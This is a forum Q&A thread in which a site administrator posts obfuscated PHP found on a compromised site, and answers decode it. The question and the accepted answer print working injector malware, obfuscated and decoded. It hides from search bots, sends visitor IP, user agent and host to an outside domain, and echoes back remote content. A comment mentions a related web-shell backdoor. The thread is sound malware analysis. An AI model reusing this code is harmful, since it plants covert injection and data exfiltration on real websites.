# What does function s37 in htaccess do?

Tags: .htaccess

Found a code this morning encoded under several layers attached to a website I administer's  .htaccess. The code reads as follows:

```
function s37($s){for ($a = 0; $a <= strlen($s)-1; $a++ ){$e .= $s{strlen($s)-$a-1};}return($e);}eval(s37(';"ni"=73c$;"ptth"=73h$;"stats"=73z$'));eval(s37(';]"TNEGA_RESU_PTTH"[REVRES_$=3au$'));eval(s37(';)"relbmaR" ,"xednaY" ,"revihcra_ai" ,"toBNSM" ,"prulS" ,"elgooG"(yarra = 73u$'));eval(s37('}};lru$ ohce;]1[lru$ = lru$ ;)lru$,"!og!"(edolpxe = lru${))"!og!",lru$(rtsrts( fi;))]"TSOH_PTTH"[REVRES_$(edocnelru."=h&".)3au$(edocnelru."=b&".]"RDDA_ETOMER"[REVRES_$."=i"."?p"."hp.".73c$."/73c$.".73c$.73c$.73c$.73c$.73c$.73c$.73c$.73c$.73c$."//".":".73h$(stnetnoc_teg_elif@ = lru$ ;)00801+)(emit,)"stats"(5dm,73z$(eikooctes@ { esle }{ )))]73z$[EIKOOC_$(tessi( ro ))3au$ ,"i/" . )73u$ ,"|"(edolpmi . "/"(hctam_gerp((fi'));
```

Clearly details of the function are written in reverse. It looks like it is sending log information to a remote server. Anyone familiar with this code or what it is doing?

Answer (score 1, accepted):

Looks like pretty heavily obfuscated stat-tracking code, but I'm more inclined to say it's malicious. `s37`, as noted, reverses the string:

```
function s37($s)
{
    $e = "";
    for ($a = 0; $a <= strlen($s)-1; $a++ )
    {
        $e .= $s{strlen($s)-$a-1};
    }
    return($e);
}
```

This, in turn, generates the following code:

```
$z37="stats";
$h37="http";
$c37="in";
$ua3=$_SERVER["HTTP_USER_AGENT"];
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if((preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_COOKIE[$z37])))
{

}
else
{
    @setcookie($z37,md5("stats"),time()+10800);
    $url = @file_get_contents($h37.":"."//".$c37.$c37.$c37.$c37.$c37.$c37.$c37.$c37.$c37.".$c37/".$c37.".ph"."p?"."i=".$_SERVER["REMOTE_ADDR"]."&b=".urlencode($ua3)."&h=".urlencode($_SERVER["HTTP_HOST"]));
    if (strstr($url,"!go!"))
    {
        $url = explode("!go!",$url);
        $url = $url[1];
        echo $url;

    }

}
```

The user-agent matching stuff prevents search engine bots from running the code. Otherwise, for browsers, a cookie gets set, then some code gets downloaded from a remote server and echoed out. The purpose of the code that's downloaded is hard to ascertain without more info.

Answer (score 0):

function s37 reverses the supplied string. function s37 doe only go for the first little bit of the line of code though...

Comment: Yes, this does appear to be true. So perhaps the right question is, what does the full block of code do?

Comment: It's some sort of stats collection. I may have gotten this wrong, but it seems to send the stats to http://ininininininininin.in/in.php

Comment: Oh, and it checks for a response, and if the response contains a URL and the text "!go!" it prints that url. This is a pretty strange script...

Comment: I've found more files scattered around the site that this may be related to. They're called "google[RANDOMNUMBERSLETTERS].php" Random numbers and letters really being something like 06f114f62492.I could copy it here, but it is fairly long. Starts out with "<?php # Web Shell by boff" and the domain referenced "exploit-db.com". It seems to be a back door.